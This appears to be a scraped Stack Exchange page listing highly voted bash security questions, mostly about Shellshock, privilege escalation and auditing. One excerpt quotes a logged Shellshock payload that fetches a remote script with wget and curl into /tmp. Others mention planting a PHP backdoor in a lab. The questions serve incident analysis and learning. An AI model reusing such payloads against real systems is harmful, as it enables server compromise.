Highest Voted 'bash' Questions - IT Security Stack Exchange

13

votes

5 answers

Is replacing bash with another shell a prudent step?

Considering that RedHat and other major teams in business are conducting an audit in bash and have uncovered a few other vulnerabilities besides -7169 (-7186 and -7187), is it sensible to link /bin/sh to another shell? Both -7186 and -7187 were…

known-vulnerabilities shellshock bash

asked Sep 27 '14 at 09:15

Deer Hunter

5,297
5
33
50

12

votes

1 answer

Even with the Shellshock patch, isn't Bash vulnerable to command redefinition?

At the risk of adding to the heap of "Shellshock"-related questions... The Shellshock patch prevents arbitrary code from being executed after function definitions in environment variables. For example, here is what a patched version of Bash does…

shellshock bash

asked Sep 25 '14 at 19:51

Sam Harada

123
6

10

votes

2 answers

Does shellshock produce a comprehensive local privilege escalation vector?

If setuid scripts take arbitrary environment variables, apart from a few black-listed ones like LD_LIBRARY_PATH, from the caller, does this not mean that any setuid script running #!/bin/bash directly or indirectly is a vector for local escalation…

shellshock bash privilege-escalation

asked Sep 29 '14 at 09:54

Ben

3,697
1
18
24

9

votes

3 answers

MSFConsole/Kali Linux - gain root access to unix system

I am messing around with Kali Linux, MSFConsole and DVWA (Damn Vulnerable Web Application). I have successfully been able to get into the system (Raspberry Pi) by creating a PHP backdoor and uploaded it via SQL injection. Now I have access the…

exploit unix kali-linux bash raspberry-pi

asked Aug 09 '15 at 17:29

iProgram

1,187
3
9
15

9

votes

4 answers

What do shellshock attacks look like in system logs?

I have some Linux servers, which from what I can tell are not vulnerable to the shellshock attack vector, but I am curious what the attack looks like in the logs. What does a successful attack look like in the appache2 logs? What would a successful…

logging shellshock vulnerability bash

asked Sep 26 '14 at 12:25

j0h

301
2
6

8

votes

1 answer

Program getting exploited inside gdb, new shell is spawned but terminated immediately

I am trying to exploit a SUID program. The program is: #include #include #include #include #define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid());…

shellcode bash debugging

asked Jun 22 '15 at 07:19

Sounak Bhattacharya

81
1
2

8

votes

1 answer

Shellshock Exploit evidence - is this a successful attack

I was looking through logs today and noticed the following: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl…

apache bash curl

asked Dec 27 '16 at 01:36

Twenty Five

81
3

7

votes

2 answers

Hacked Ubuntu server, probably hacked commands (netstat, ps, ...), how to replace them?

An Ubuntu server of my company has been hacked to carry out a DoS attack. I found the shellshock bug had not been fixed by my colleagues, and I think it's the problem. Then, I found an ELF file that sends thousands messages, and the script is…

linux shellshock bash ubuntu

asked Nov 28 '14 at 11:28

roghan

97
1
5

7

votes

5 answers

Shellshock attack scenario exploiting php

I've seen attack scenarios involving using wget on cgi-scripts, but how about a scenario exploiting a web server php script that issues an exec() or system() call to a bash script? As far as I can tell, environment variables like HTTP_USER_AGENT…

php shellshock bash

asked Sep 26 '14 at 11:54

Joe Knapp

171
1
1
4

7

votes

2 answers

/opt and sudo unzip to /opt, is it safe?

Usually we place things in /opt so they are owned by root but normal users can execute them. This prevents normal users modifying the binaries so they cannot execute arbitrary stuff. However, to put things there using sudo unzip something.zip -d…

exploit permissions docker bash root

asked Apr 23 '22 at 23:10

Guerlando OCs

405
4
14

7

votes

2 answers

Bash function manipulation explained

I was recently reading through a write up on a capture the flag Linux VulnHub machine. For privilege escalation, the author references 'bash function manipulation'. A Google search turns up very little on how this works. In short they run strings on…

linux privilege-escalation bash binary-code

asked Mar 28 '19 at 13:52

n00b

445
2
13

7

votes

3 answers

SH Write a file with contents without any special chars

So, I've got a challenge and it's as follows. You can access a normal shell(sh) on clean RHEL 6 installation. Write arbitrary content to file.txt, but without the following characters. # & \ + - % @ = : ; , . ' " ^ ` ~ _ | ! / ? * $ # < > [ ] { }…

bash

asked Feb 25 '19 at 22:24

rotatorexperiment

71
1

7

votes

2 answers

Do sudo and .profile/.bashrc enable trivial privilege escalation?

First of all, let me mention that I’m assuming a configuration as set up by current Linux desktop distributions (e. g. Debian, Fedora). I’m sure that there are methods which, if implemented, would mitigate the issues described here. What I’m…

linux privilege-escalation bash sudo path-injection

asked Jun 11 '18 at 00:32

Socob

215
1
5

7

votes

2 answers

How do I track bash history cleanup?

I'd like to catch events when bash history is cleaned or some lines are deleted. Are there any best practices or auditing tools with this capability?

linux audit bash siem

asked Jul 24 '17 at 15:02

inx

71
3

7

votes

3 answers

How to securely store credentials in a bash variables?

I need to cache my user credentials in a shell script variable since they are required for multiple requests to a REST-API. It won't be stored in the bash script file itself: user is prompted to enter credentials, and these will be reused along the…

bash credentials

asked Feb 07 '17 at 09:03

Thomas R

71
1
1
4

Questions tagged [bash]